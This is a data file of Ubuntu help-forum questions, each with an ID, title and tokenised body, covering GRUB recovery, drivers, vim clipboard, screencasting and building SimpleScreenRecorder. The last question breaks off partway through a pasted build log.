347504	grub rescue/ no ubuntu/no windows cd	i needed to reinstall window on my computer . i had a partition for each os . when i used my built in recovery system , the `` grub rescue '' popped up saying `` error : no such partition '' i ca n't get past this screen . any suggestions ? i have an asus x53s and i used the built in asus recovery . in the options , i chose format whole disk with 2 partitions . i do n't have the ubuntu partition any more . any suggestions ? i do not have a windows cd available .
347506	how can we get the command line of a running application ?	in ubuntu , applications can be opened from a terminal . but sometimes it is n't clear what the appropriate command is to do this . so , having an application open , how can i get the command used to launch it , without having to search anywhere ( just by looking at it ) ?
347512	benefits of using server vs desktop	i 'm trying to set up a mapserver . i 've done this before in ubuntu desktop , but this time i thought i 'd try ubuntu server ... i 'm finding it pretty difficult to get to grips with the server - absolutely nothing is straightforward to a linux newbie , so i thought i 'd raise the question - is it worth it ? so bearing in mind that once it 's all set-up , i wo n't need a gui ( which is why i chose the server ) , is there a performance or other advantage to using the server over the desktop ? i 'm running 12.04 .
347513	how to synchronise my files over lan ( ubuntu/windows , i 'm a novice )	i am trying to synchronise my files ( there is too much data to use a cloud service ) between my netbook ( windows xp ) and my new ubuntu machine using a lan cable . i was pleasantly surprised when ubuntu was able to link straight to my netbook over the lan . i can see and access the shared files on it , but for some reason , copying them straight over in batches always leads to an error after a while . besides , i am likely to write on either machine , and need a proper sync . i used syncback on my old windows machine , which worked great . if i am to switch to ubuntu like i hope , i 'll need something as useful . i have managed to install freefilesync and samba . ffs does not show the network path when you browse for folders ( neither did syncbackup when i tried that ) . samba does n't seem to see it either , not that i really know how to work it ! i have n't had any joy with several hours of internet searching ... could anyone help please ? i am a linux novice and any instructions , especially ones using the terminal , would need to be pretty idiot-proof as i have no prior knowledge ! this questions related pretty closely to this one simple and easy way to sync folders over lan but of course it said you ca n't respond to it to ask for further help !
347516	where can i get3d screen savers for ubuntu 12.04 ?	i want 3d screen saver for ubuntu 12.04. where and how can i get them ?
347518	qt creator reverted back to some previous version	i 've had qt creator on my machine for quite a while , and after adding the necessary ppas , i could use it for ubuntu touch , the ubuntu sdk being installed and all . yesterday , i noticed that qt had been reverted back to some previous version . the ubuntu sdk no longer exists , nor do the tools within qt for ut . its gone , all of it . the update manager had a few updates from the sdk team , a few plugins for qt and a qt creator file ( around 12mb ) , i ran the update , but everything remained the same . how can this be sorted out ? it 's necessary that i get the sdk back .
347519	unable to copy from vim to system clipboard	as said in the title i am unable to copy from vim to system clipboard . viceversa works , copying from outside vim and pasting with p is ok . i have installed clipboard support , vim version is 7.3.429 : $ vim -- version | grep clip +clientserver +clipboard +cmdline_compl +cmdline_hist +cmdline_info +comments +xsmp_interact +xterm_clipboard -xterm_save i have : set clipboard=unnamedplus in my .vimrc and it is set when i do : set clipboard ? or : echo has ( 'clipboard ' ) i am using ubuntu 12.04 lts , and vim inside gnome-terminal ( but also gvim has the same problem ) . any idea ? thanks
347528	i ca n't find chromium on ubuntu software center	it should be there right ? ubuntu 13.10 - 64bit
347529	my ubuntu 12.04 freezing at checking battery state at boot time ?	i updated my desktop computer from official updates but after the update my computer does not open the user interface . i tried to remove and install all different nvidia drivers but still same . however if i remove all the drivers it goes into the user interface but in very poor resolution . do you have any suggestion for the solution ?
347531	how to choose to open with software center application from the browser ?	i am currently using ubuntu 12.04 . i wanted to install fonts for the indian languages and searching in google led me to this site . when i clicked on the available on the software centre button , the launch application window opens . i clicked the choose button to choose the software centre application . but i do not know the location to choose from i.e. , where the software centre application resides on my pc . how do i find it ?
347537	ca n't use canon mx435 scanner with ubuntu 13.04	i installed the driver for the canon printer , and it works ok with ubuntu 13.04 but i ca n't use the scanner that comes with the printer . any help ?
347538	install a later version of gnome3.nstall a later version of gnome3.4	how to install a later version of gnome-shell 3.4 in ubuntu 12.04 safely ? thank you .
347539	setup wi-fi 's proxy on ubuntu os	ok , on my school 's wi-fi , it requires proxy to be setup , so i am asking if there is a way to setup a proxy on ubuntu 's wifi settings , is there ?
347546	a question about acer c710-2856	i have a question about acer c710-2856 ? this chromebook only have 16 ssd , is it possible to install ubuntu on this system ?
347549	any recomendations for a remote connection manager	i currently use pac ( perl auto connect ) , but i am largely unhappy with it in a few way . i am looking for a remote connection manager to replace it . this should be a very popular topic with people that manage more then a few machines , but i ca n't seem to find current recommendations . i am not apposed to a `` system '' or `` workflow '' that solves these problem , but i also do n't want to change every single little thing either . must haves : must be able to list and store connection information for many servers , preferably in a hierarchy ( servers in location 1 , linux servers , production servers etc . ) must be able to connect to ssh using standard ( system ) ssh libraries and settings ( keys , known_hosts , etc ) must be able to store several users for one host . it does n't matter if these are many different `` connections '' or one connection with different settings , but often i have to connect to the same server as many different users . must be able to run `` in the background '' . gnome-terminal is great but i have been running a s3cmd sync for 8 days now and there 's probably another 8 days left . i do n't want the `` terminal '' window hanging around . i would prefer it `` minimize to system tray '' or something . must be stable . crashing , even a little is not an option . must be able to launch a local shell . should have should be able to connect to several protocols and maybe launch external programs . for an absolute minimum for this is ssh , vnc , and rdp , but it would be nice to ftp and sftp/scp to be in there as well , even if they just launch filezilla ( or some such ) . should be able to integrate will into the system . hard to explain but i want to be able to ssh server.com from the terminal too . mostly this just means that it needs to use the same standard libraries and configuration . should be easy to setup a new host ( configure new connections ) . i have to do this frequently . should be able to set arguments per connection . i.e . some connections need -x most do not . could have some kind of fancy integration , or management of passwords/keys via key rings ? when setting up a host have a check box for services provided that auto creates `` connections '' like when setting up server.com have check boxes for ssh , rdp , vnc , x , ftp , sftp , etc . that auto generates the connections as needed . to be clear most of my connections are ssh . but there is always those one or two windows boxen that just wo n't go away , or the odd client that demands ftp even though you have explained that it 's totally insecure .
347550	ca n't install `` cedar trail drm driver in dkms format '' on ubuntu 12.04	ubuntu 12.04 32bit ... toshiba nb520 *side-note , this computer is so slow even with a 2gbram ; far better than my emachine and neo laptop . i think this is the answer : driver . /var/log/jockey.log 2013-09-19 05:29:36,773 debug : comparing 3.8.0-29 with 2013-09-19 05:32:45,094 debug : updating < jockey.detection.localkernelmodulesdriverdb instance at 0x8427a0c > 2013-09-19 05:32:50,861 debug : reading modalias file /lib/modules/3.8.0-29-generic/modules.alias 2013-09-19 05:32:56,240 debug : reading modalias file /usr/share/jockey/modaliases/b43 2013-09-19 05:32:56,265 debug : reading modalias file /usr/share/jockey/modaliases/disable-upstream-nvidia 2013-09-19 05:32:56,474 debug : loading custom handler /usr/share/jockey/handlers/dvb_usb_firmware.py 2013-09-19 05:32:56,791 debug : instantiated handler subclass __builtin__.dvbusbfirmwarehandler from name dvbusbfirmwarehandler 2013-09-19 05:32:56,792 debug : firmware for dvb cards not available 2013-09-19 05:32:56,793 debug : loading custom handler /usr/share/jockey/handlers/cdv.py 2013-09-19 05:32:56,927 warning : modinfo for module cedarview_gfx failed : error : modinfo : could not find module cedarview_gfx 2013-09-19 05:32:58,213 debug : linux-lts-raring installed : true linux-lts-saucy installed : false linux minor version : 8 xserver abi : 13 xserver-lts-quantal : false 2013-09-19 05:32:58,214 debug : instantiated handler subclass __builtin__.cdvdriver from name cdvdriver 2013-09-19 05:32:58,214 debug : cdv.available : falling back to default 2013-09-19 05:32:58,685 debug : xorgdriverhandler ( cedarview_gfx , cedarview-graphics-drivers , none ) : disabling as package video abi ( s ) xorg-video-abi-11 not compatible with x.org video abi xorg-video-abi-13 2013-09-19 05:32:58,686 debug : intel cedarview graphics driver not available 2013-09-19 05:32:58,687 debug : loading custom handler /usr/share/jockey/handlers/vmware-client.py 2013-09-19 05:32:58,716 warning : modinfo for module vmxnet failed : error : modinfo : could not find module vmxnet 2013-09-19 05:32:58,717 debug : instantiated handler subclass __builtin__.vmwareclienthandler from name vmwareclienthandler 2013-09-19 05:32:58,758 debug : vmware client tools availability undetermined , adding to pool 2013-09-19 05:32:58,758 debug : loading custom handler /usr/share/jockey/handlers/nvidia.py 2013-09-19 05:32:58,826 warning : modinfo for module nvidia_304 failed : error : modinfo : could not find module nvidia_304 2013-09-19 05:32:58,836 debug : instantiated handler subclass __builtin__.nvidiadriver304 from name nvidiadriver304 2013-09-19 05:32:58,837 debug : nvidia.available : falling back to default 2013-09-19 05:33:11,682 debug : nvidia accelerated graphics driver availability undetermined , adding to pool 2013-09-19 05:33:11,688 warning : modinfo for module nvidia_304_updates failed : error : modinfo : could not find module nvidia_304_updates 2013-09-19 05:33:11,696 debug : instantiated handler subclass __builtin__.nvidiadriver304updates from name nvidiadriver304updates 2013-09-19 05:33:11,696 debug : nvidia.available : falling back to default 2013-09-19 05:33:24,326 debug : nvidia accelerated graphics driver ( post-release updates ) availability undetermined , adding to pool 2013-09-19 05:33:24,332 warning : modinfo for module nvidia_current_updates failed : error : modinfo : could not find module nvidia_current_updates 2013-09-19 05:33:24,339 debug : instantiated handler subclass __builtin__.nvidiadrivercurrentupdates from name nvidiadrivercurrentupdates 2013-09-19 05:33:24,340 debug : nvidia.available : falling back to default 2013-09-19 05:33:24,381 debug : nvidia accelerated graphics driver ( post-release updates ) not available 2013-09-19 05:33:24,387 warning : modinfo for module nvidia_experimental_304 failed : error : modinfo : could not find module nvidia_experimental_304 2013-09-19 05:33:24,427 debug : instantiated handler subclass __builtin__.nvidiadriverexperimental304 from name nvidiadriverexperimental304 2013-09-19 05:33:24,427 debug : nvidia.available : falling back to default 2013-09-19 05:33:24,461 debug : nvidia accelerated graphics driver ( **experimental** beta ) not available 2013-09-19 05:33:24,467 warning : modinfo for module nvidia_current failed : error : modinfo : could not find module nvidia_current
347553	is it possible to hide the `` show desktop '' icon in application switcher ?	is it possible to hide the `` show desktop '' icon in the application switcher ( when you press alt+tab ) ? it 's very annoying when you have a workflow , press alt+tab one time too much and every window is minimised .
347554	should i install bumblebee ?	my laptop has dual graphics intel graphics 4000 nvidia geforce 630m when i run this command in the terminal : sudo cat /sys/kernel/debug/vgaswitcheroo/switch i get the following output : 0 : igd : + : pwr:0000:00:02.0 1 : dis : : pwr:0000:01:00.0 i read that ( + ) means that only integrated graphics card is powered on . now my question is that , should i install bumblebee ? the doubt is because , my battery shows 2hrs only ( fully charged ) . but , it can stand for about 4hrs ( fully charged ) in windows . give me suggestion on whether to install bumblebee or not . thank you
347555	how do i list all installed packages with specific version numbers ?	i would like to list all the installed packages , with specific version numbers on my system . i checked out dpkg -- get-selections ( how to list all installed packages ? ) but it does n't show me what i need . for example : $ dpkg -- get-selections apache2 apache2 install shows that apache2 is installed , however not the version . i recently did a apt-get upgrade so apache2.2.22-1 should be version installed ( http : //packages.ubuntu.com/precise-updates/apache2.2-common ) , but how can i show that ? thanks !
347556	language locales configuration file	ubuntu , where is the locales configuration file . i want to leave en_us_utf8 and remove others like en_gb or en_zimbabwe . is it the locale-archive file /usr/lib/locale , because i ca n't open this file .
347560	specify the target directory in a package	i created a package ( with dpkk-build and dh_make ) from my own program source and got a deb-binary . so far , so good . no if i 'd upload the package to my ppa and installed it from there , the program would not work because i did not specify where it should install the files . after creating and configuring the debian folder ( after dh_make ) , my project folder looks like : /main.py ( the programm ) /icons/ ... /saves/ ... /debian/ ... now my questions : how/where ( perhaps in control or rules in /debian ? ) do i specify where to copy the first 3 files/folders to ? i would like to copy my whole program including the main script to /opt/extras.ubuntu.com/program-name . moreover i 'd also need to copy a .desktop file to /usr/share/applications that executes the main.py script . where do i place the needed instructions ? edit as the dh_make did not do itself but can be found in the docs here , i made an install-file in the /debian directory containing the files to be moved . after a debuild -s there was a subdirectory named like the package created , and in its tree structure ( like the destination described in the install file ) the files were placed . so i guess it will work on a regular install . only one more question : how can i set chmod+x to those installed files ?
347571	users not created during installation	i 've successfully installed ubuntu 12.04 . on re-booting i was presented with the logon screen and on entering the password for the user , i get an invalid password error . on searching for a solution , i stumbled upon http : //www.psychocats.net/ubuntu/resetpassword . however , after going down to the 'root ' on entering `` ls /home '' i see no users . i can logon using the 'guest ' session and from within that session , i can see a user account . how do i logon with the created user account ? how do i reset the password for that account ? any help will greatly be appreciated .
347574	how to do screencasting ( desktop recording ) with high quality audio and video ?	i have googled around and found all the usual solutions . none of them work for me . first of all , i want to make high quality recordings . second , i use jack audio ( pulseaudio is completely uninstalled . ) my os and hardware details are at the end . but i think jack audio is the main challenge when it comes to screencasting . jack is my only option because this computer 's purpose is audio production . my next challenge seems to be ubuntu itself ... ffmpeg and ubuntu are n't so friendly . i do n't really feel like compiling my own ffmpeg , for example . and even if i do ( which is an option of last resort ) , i want to be able to record specific program windows easily , even if they move around on the screen . command line ffmpeg seems to be limited to recording predefined screen regions and it lacks flexibility , easy of use , and simplicity . i seek a gui approach to recording my desktop with audio using jack . and i want high quality audio and video that are sync 'd . i think a significant number of linux users are interested in a solution like this . the developer of simplescreenrecorder ( ssr ) said he intends to add jack support , so ssr is at the top of my list of potential solutions . main page - simplescreenrecorder - maarten baert 's website ( unfortunately , the repo version of ssr crashes and i ca n't try the current/latest git version because i ca n't get the git version to build on ubuntu , but i 'll open a separate question for that . ) until ssr comes along with jack audio support ( if it does ) , i hope someone else has a solution that works now . btw , i do have the jack2alsa bridge . ( it 's part of kx studio . ) i am running kubuntu 12.04 . additionally , i have installed the raring-lts hardware enablement stack , kx studio , and kernel 3.8.0-30-lowlatency . i use an amd/ati radeon hd6750 1 gb pci-express video card with 3 monitors and a focusrite scarlett 2i2 audio interface . here are some of the links i investigated in my screencasting research : 5 ways to record desktop in linux https : //www.foresightlinux.se/5-ways-to-record-your-desktop-in-linux/ screen video capture for linux - linux mint community http : //community.linuxmint.com/tutorial/view/1229 kde4 built-in screencast for desktop recording | flapjacktastic http : //alicious.com/kde4-built-in-screencast-for-desktop-recording/ # comments record desktop in linux using ffmpeg | xpressrazor http : //xpressrazor.wordpress.com/2013/05/26/record-desktop-in-linux-using-ffmpeg/ record desktop in linux using ffmpeg | xpressrazor http : //xpressrazor.wordpress.com/2013/05/26/record-desktop-in-linux-using-ffmpeg/ capture video of a linux desktop | commandlinefu.com http : //www.commandlinefu.com/commands/view/148/capture-video-of-a-linux-desktop how to record your desktop using ffmpeg on ubuntu linux : 10 steps http : //www.wikihow.com/record-your-desktop-using-ffmpeg-on-ubuntu-linux main page - simplescreenrecorder - maarten baert 's website http : //www.maartenbaert.be/simplescreenrecorder/ # feedback-bugs-feature-requests 6 of the best free linux screencasting software - linux links - the linux portal site http : //www.linuxlinks.com/article/20090720142023520/screencasting.html 6 of the best free linux screencasting software - linux links - the linux portal site http : //www.linuxlinks.com/article/20090720142023520/screencasting.html [ ubuntu_studio ] ffmpeg using jack as an input http : //ubuntuforums.org/showthread.php ? t=1556038 & p=9738369 # post9738369 record your desktop in linux using ffmpeg : linux http : //www.reddit.com/r/linux/comments/1f2edq/record_your_desktop_in_linux_using_ffmpeg/ crazed mule productions : recording desktop with ffmpeg http : //crazedmuleproductions.blogspot.com/2012/01/recording-desktop-with-ffmpeg.html
347575	keyboard shortcuts do n't work with mate	i 'm on a ubuntu 13.04 machine with mate 1.7 installed . i 'm trying to open the keyboard shortcuts menu , but nothing happens . anyway , i can reach it through : system option - > keyboard - > shortcuts last week , i added a shortcut gnome-screenshot -a -c but it does n't work anymore . so , i discover that my shortcut disappears from the menu and when i try to add it again , it does n't work neither . i also tried to add more shortcuts , not only those of gnome-screenshot , but no one works . ideas ?
347576	lenovo z470 keyboard gets stuck	i installed ubuntu 13.04 64bit on my lenovo idea pad z470 . my problem is when i press any of the hardware one-touch short-cut keys for volume control , heat control , etc. , my keyboard gets stuck , and i 'm no more able to type anything there on .
347577	any built in switch for switching between ig and discrete graphics for bumblebee	i have installed bumblebee . everytime i want to run an application , i need to use the keyword optirun . is there a way to load the application using nvidia card whenever it is needed automatically ? i mean without using the keyword optirun in terminal ( it 's a headache to run every application by typing ) thanks for your replies
347581	checksum validation error	downloaded images failed checksum validation i tried to install ubuntu on a nexus 7 . i have tried several times in the last month . i followed all directions to the letter , and went through all the troubleshooting steps . i re-downloaded the ubuntu core nexus 7 installer , but i still always get the above notice . any suggestions ?
347584	can i trust 3rd party software ?	i 've begun to appreciate ubuntu and the philosophy of open source software , and now i have a doubt about 3rd party software . is it a bad idea to download them or can i trust every open source software ? will they affect the stability of my os ( ubuntu ) or cause some security errors ?
347586	how to build and install latest simplescreenrecorder from git ?	i want to install simplescreenrecorder ( ssr ) from git as recommended by the developer . the binary version crashes and it is possible that the git version already has the fixes for my crash problem . main page - simplescreenrecorder - maarten baert 's website unfortunately , i ca n't get the current/latest git version to build on ubuntu . the instructions are found here : https : //github.com/maartenbaert/ssr in those instructions , the dev says , `` if the 32-bit build fails because libraries are missing , but 64-bit works fine , read the instructions above again : ) . '' that seems to be my problem , but reading the instructions again has n't clarified my problem . so i am asking here . instructions : sudo apt-get install build-essential pkg-config qt4-qmake libqt4-dev libavformat-dev libavcodec-dev libavutil-dev libswscale-dev libasound2-dev libpulse-dev libgl1-mesa-dev libx11-dev libxext-dev libxfixes-dev g++-multilib ia32-libs if the 32-bit version of some library is n't found , but 64-bit works fine , try this : cd /usr/lib/i386-linux-gnu/ sudo ln -s libgl.so.1 mesa/libgl.so sudo ln -s mesa/libgl.so libgl.so sudo ln -s libglu.so.1 libglu.so sudo ln -s libx11.so.6 libx11.so sudo ln -s libxext.so.6 libxext.so sudo ln -s libxfixes.so.3 libxfixes.so sudo ldconfig the dev says : i do n't know whether this is the right way to do it , but it works for me . if you are using a proprietary driver , the location of libgl will be different . in that case , use 'libgl.so ' instead of 'mesa/libgl.so ' . compiling and installing note : i do have a proprietary ( fglrx ) video driver . i think it might be found here ( based on what i see in the xorg.log ) : /usr/lib/xorg/modules/drivers/fglrx_drv.so however , i need specific help on this step ! if you have installed simplescreenrecorder as a package from a repository , you should uninstall that version first to avoid conflicts . if you do n't do this , the two versions may overwrite each other or use the wrong version of the glinject library . the simplest way to compile and install everything is to run : ./simple-build-and-install this will compile the 64-bit main program and library , and then the 32-bit library . if the 32-bit build fails because libraries are missing , but 64-bit works fine , read the instructions above again : ) . that seems to be my main problem . the error i see is : configure : error : required library missing however , i also see this : detecting ffmpeg/libav ... detected ffmpeg . that concerns me because ffmpeg is a custom compiled version and i doubt it has the required options ... although i did enable libx264 and maybe that is enough . i do n't know . here 's the relevant ffmpeg info : $ ffmpeg -version ffmpeg version 0.10.8-7:0.10.8-1~precise1 built on sep 5 2013 14:56:20 with gcc 4.6.3 configuration : -- arch=amd64 -- disable-stripping -- enable-pthreads -- enable-runtime-cpudetect -- extra-version='7:0.10.8-1~precise1 ' -- libdir=/usr/lib/x86_64-linux-gnu -- prefix=/usr -- enable-bzlib -- enable-libdc1394 -- enable-libfreetype -- enable-frei0r -- enable-gnutls -- enable-libgsm -- enable-libmp3lame -- enable-librtmp -- enable-libopencv -- enable-libopenjpeg -- enable-libpulse -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-vaapi -- enable-vdpau -- enable-libvorbis -- enable-libvpx -- enable-zlib -- enable-gpl -- enable-postproc -- enable-libcdio -- enable-x11grab -- enable-libx264 -- shlibdir=/usr/lib/x86_64-linux-gnu -- enable-shared -- disable-static libavutil 51 . 35.100 / 51 . 35.100 libavcodec 53 . 61.100 / 53 . 61.100 libavformat 53 . 32.100 / 53 . 32.100 libavdevice 53 . 4.100 / 53 . 4.100 libavfilter 2 . 61.100 / 2 . 61.100 libswscale 2 . 1.100 / 2 . 1.100 libswresample 0 . 6.100 / 0 . 6.100 libpostproc 52 . 0.100 / 52 . 0.100 here is the entire ssr build log : $ ./simple-build-and-install detecting ffmpeg/libav ... detected ffmpeg . detecting x86/x64 ... x86/x64 = 1 configuring ... checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking whether gcc understands -c and -o together ... yes checking dependency style of gcc ... gcc3 checking for ar ... ar checking the archiver ( ar ) interface ... ar checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking how to run the c preprocessor ... gcc -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... yes checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking whether gcc understands -c and -o together ... ( cached ) yes checking dependency style of gcc ... ( cached ) gcc3 checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking dependency style of g++ ... gcc3 checking how to run the c++ preprocessor ... g++ -e checking for ld used by g++ ... /usr/bin/ld -m elf_x86_64 checking if the linker ( /usr/bin/ld -m elf_x86_64 ) is gnu ld ... yes checking whether the g++ linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking for g++ option to produce pic ... -fpic -dpic checking if g++ pic flag -fpic -dpic works ... yes checking if g++ static flag -static works ... yes checking if g++ supports -c -o file.o ... yes checking if g++ supports -c -o file.o ... ( cached ) yes checking whether the g++ linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking dynamic linker characteristics ... ( cached ) gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking for a sed that does not truncate output ... ( cached ) /bin/sed checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for qt4 ... yes checking for moc-qt4 ... /usr/bin/moc-qt4 checking for rcc-qt4 ... no checking for rcc ... /usr/bin/rcc checking for uic-qt4 ... /usr/bin/uic-qt4 checking for clock_gettime in -lrt ... yes checking for dlfcn.h ... ( cached ) yes checking for dlsym in -ldl ... yes checking libavformat/avformat.h usability ... yes checking libavformat/avformat.h presence ... yes checking for libavformat/avformat.h ... yes checking for av_guess_format in -lavformat ... yes checking libavcodec/avcodec.h usability ... yes checking libavcodec/avcodec.h presence ... yes checking for libavcodec/avcodec.h ... yes checking for avcodec_find_encoder_by_name in -lavcodec ... yes checking libavutil/avutil.h usability ... yes checking libavutil/avutil.h presence ... yes checking for libavutil/avutil.h ... yes checking libavutil/mathematics.h usability ... yes checking libavutil/mathematics.h presence ... yes checking for libavutil/mathematics.h ... yes checking for av_rescale_q in -lavutil ... yes checking libswscale/swscale.h usability ... yes checking libswscale/swscale.h presence ... yes checking for libswscale/swscale.h ... yes checking for sws_scale in -lswscale ... yes checking x11/xlib.h usability ... yes checking x11/xlib.h presence ... yes checking for x11/xlib.h ... yes checking for x11/xutil.h ... yes checking for xopendisplay in -lx11 ... yes checking for x11/extensions/xfixes.h ... yes checking for xfixesgetcursorimage in -lxfixes ... yes checking for x11/extensions/xshm.h ... yes checking for xshmcreateimage in -lxext ... yes checking alsa/asoundlib.h usability ... yes checking alsa/asoundlib.h presence ... yes checking for alsa/asoundlib.h ... yes checking for snd_pcm_open in -lasound ... yes checking pulse/context.h usability ... yes checking pulse/context.h presence ... yes checking for pulse/context.h ... yes checking for pa_context_new in -lpulse ... yes checking gl/gl.h usability ... yes checking gl/gl.h presence ... yes checking for gl/gl.h ... yes checking for gl/glext.h ... yes checking for gl/glx.h ... yes checking for glpushattrib in -lgl ... yes checking gl/glu.h usability ... yes checking gl/glu.h presence ... yes checking for gl/glu.h ... yes checking for gluerrorstring in -lglu ... yes checking that generated files are newer than configure ... done configure : creating ./config.status config.status : creating makefile config.status : creating data/makefile config.status : creating glinject/makefile config.status : creating src/makefile config.status : creating config.h config.status : config.h is unchanged config.status : executing depfiles commands config.status : executing libtool commands compiling ... make all-recursive make [ 1 ] : entering directory `/workspaces/ssr/build' making all in data make [ 2 ] : entering directory `/workspaces/ssr/build/data' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/workspaces/ssr/build/data' making all in glinject make [ 2 ] : entering directory `/workspaces/ssr/build/glinject' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/workspaces/ssr/build/glinject' making all in src make [ 2 ] : entering directory `/workspaces/ssr/build/src' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/workspaces/ssr/build/src' make [ 2 ] : entering directory `/workspaces/ssr/build' make [ 2 ] : leaving directory `/workspaces/ssr/build' make [ 1 ] : leaving directory `/workspaces/ssr/build' configuring 32-bit glinject library ... checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for style of include used by make ... gnu checking for gcc ... gcc -m32 checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc -m32 accepts -g ... yes checking for gcc -m32 option to accept iso c89 ... none needed checking whether gcc -m32 understands -c and -o together ... yes checking dependency style of gcc -m32 ... gcc3 checking for ar ... ar checking the archiver ( ar ) interface ... ar checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for fgrep ... /bin/grep -f checking for ld used by gcc -m32 ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc -m32 object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking how to run the c preprocessor ... gcc -m32 -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc -m32 supports -fno-rtti -fno-exceptions ... no checking for gcc -m32 option to produce pic ... -fpic -dpic checking if gcc -m32 pic flag -fpic -dpic works ... yes checking if gcc -m32 static flag -static works ... yes checking if gcc -m32 supports -c -o file.o ... yes checking if gcc -m32 supports -c -o file.o ... ( cached ) yes checking whether the gcc -m32 linker ( /usr/bin/ld -m elf_i386 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... yes checking for gcc ... ( cached ) gcc -m32 checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc -m32 accepts -g ... ( cached ) yes checking for gcc -m32 option to accept iso c89 ... ( cached ) none needed checking whether gcc -m32 understands -c and -o together ... ( cached ) yes checking dependency style of gcc -m32 ... ( cached ) gcc3 checking whether we are using the gnu c++ compiler ... yes checking whether g++ -m32 accepts -g ... yes checking dependency style of g++ -m32 ... gcc3 checking how to run the c++ preprocessor ... g++ -m32 -e checking for ld used by g++ -m32 ... /usr/bin/ld -m elf_i386 checking if 